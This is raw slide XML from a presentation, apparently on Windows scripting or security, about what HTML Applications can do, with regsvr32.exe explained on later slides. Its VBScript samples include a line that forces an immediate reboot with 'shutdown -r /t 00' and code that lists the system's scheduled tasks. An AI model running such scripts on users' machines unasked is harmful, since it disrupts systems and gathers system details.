            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>objwsh.Run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> "shutdown -r /t 00", , True</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1900" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00A249"/>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31</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Things That We Can Do with HTA on the Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>System (2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Đỗ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> Anh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Tú</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4019013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32019" y="2348880"/>
            <a:ext cx="7408333" cy="4464496"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2900" dirty="0"/>
              <a:t>Task Schedule — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CreateObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Schedule.Service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script language="VBScript"&gt;</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Set service= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CreateObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Schedule.Service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>")</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err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>service.Connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</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Set folder = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>service.GetFolder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("\")</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Set tasks = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>folder.GetTasks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(0)</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If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tasks.Count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = 0 Then </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err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>MsgBox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> "Task registered: 0"</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Else</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err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>MsgBox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> "Tasks registered: " &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tasks.Count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <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For Each Task In Tasks</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output = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Task.Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <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output = output&amp; " " &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Task.NextRunTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <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output = output &amp; " " &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Task.LastTaskResult</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <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err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>MsgBox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> output</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Next</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End If</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>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32</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Things That We Can Do with HTA on the Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>System (3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Đỗ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> Anh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Tú</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23613934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connect to an DB via ADO to extent your HTML Application storage ability:</a:t>
            </a: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33</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Things </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>That We Can Do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>with HTA on the Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>System (4) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Đỗ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> Anh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Tú</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="117296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34</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836386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lgn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="4000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00A249"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>regsvr32.ext</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="4000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00A249"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pP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35</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="990857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536" y="2564904"/>
            <a:ext cx="8352928" cy="4032448"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>egsvr32.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>calls an exported method </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>DllRegisterServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> in the DLL. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>What </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>specifically happens next is up to the implementation. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Often </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>registry keys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>COM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> are written based on the file location. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>registration should not, generally, be considered an installer that does much beyond that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a: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36</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="338328"/>
            <a:ext cx="8435280" cy="1252728"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>What </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Does </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>regsvr32.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> Do?         </a:t>
            </a:r>
